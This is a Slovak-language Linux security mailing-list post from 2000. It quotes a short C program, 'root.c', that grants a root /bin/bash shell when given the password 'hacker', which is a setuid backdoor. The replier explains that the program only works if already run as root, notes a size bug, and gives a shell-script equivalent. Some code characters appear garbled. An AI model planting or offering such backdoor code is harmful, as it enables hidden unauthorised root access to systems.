Bezpecnost Linuxu
Blasko Marek
Blasko na vuje.sk
Pondělí Květen 29 16:36:12 CEST 2000
> > > /* ------------start root.c------------- */
> > >
> > > main(argc, argv)
> > > int argc;
> > > char **argv;
> > > {
> > > char seteuid[10];
> > > char showmount[10];
> > >
> > > seteuid[0]='h';
> > > seteuid[1]='a';
> > > seteuid[2]='k';
> > > seteuid[3]='e';
> > > seteuid[4]='r';
> > > seteuid[5]='%%%%%';
> > > showmount[0]='/';
> > > showmount[1]='b';
> > > showmount[2]='i';
> > > showmount[3]='n';
> > > showmount[4]='/';
> > > showmount[5]='b';
> > > showmount[6]='a';
> > > showmount[7]='s';
> > > showmount[8]='h';
> > > showmount[9]='%%%%%';
> > > if (argc>1) {
> > > if (!strcmp(argv[1],seteuid)) {
> > > setuid(0);
> > > setgid(0);
> > > execl(showmount,"-i",0);
> > > }
> > > }
> > > }
> > >
> > > /* ---------konec root.c----------- */
> A co to ma delat?
no mato spustit /bin/sh z pravami roota ale ide to len ked si root ;)
inak to neskopnes a ma tam pretecetnie pi zadavani nazvu showmount je na
11 znakov a dava tam 14 ;) a neviem preco sa stim tolko serie mohol to
spravit v sheli a bolo bi ;)
#/bin/sh
SETUID="hacker"
SHOWMOUNT="/bin/sh"
if "$SETUID" = "$1"; then
/bin/sh
fi
a robi to to iste iked neviem naco tam ma to heslo a preco root(0,0)
dava suid a guid znova 0 a potom spusti sh
no lepsi vymisel som vypotil po dvochj tizdnoch z unixami :(
--
Zivot ma len jednu ulohu.
TOTALNE NAS ZNICIT!
Zz_indigo /*Marek Blasko*/ -=OM2AMB=-
Další informace o konferenci Linux